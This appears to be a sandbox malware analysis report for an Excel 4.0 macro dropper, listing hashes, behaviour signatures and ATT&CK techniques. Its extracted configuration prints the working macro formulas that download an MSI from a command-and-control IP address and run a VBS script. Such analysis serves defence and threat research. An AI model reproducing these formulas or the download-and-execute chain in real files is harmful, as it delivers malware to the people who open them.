Overview

overview

10

Static

static

10

f9c430c306...8.xlsm

windows7-x64

10

f9c430c306...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f9c430c306834c158889f954dee30533_JaffaCakes118

  • Size

    6KB

  • Sample

    240419-hv1xqscd4y

  • MD5

    f9c430c306834c158889f954dee30533

  • SHA1

    036901f031a0085cf830b5fe180702a1c1c3529b

  • SHA256

    46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82

  • SHA512

    82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8

  • SSDEEP

    192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187

Targets

    • Target

      f9c430c306834c158889f954dee30533_JaffaCakes118

    • Size

      6KB

    • MD5

      f9c430c306834c158889f954dee30533

    • SHA1

      036901f031a0085cf830b5fe180702a1c1c3529b

    • SHA256

      46651237585bcaacebcf2d327cd1686a4395ea481875eb2d79f5435067c34c82

    • SHA512

      82c7fd8c02993cc01826dcacb20e417cb14b6f779e07412b3caff8c9f5f249efc48688535ff8682b9192f82a642c2c2af17605df260a5b4e0bab434726436cb8

    • SSDEEP

      192:NDShuSZ1aEOmmfRy8UhHFBFYucb98yzKM9Y:N2uUwA1FYhb98yzKuY

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks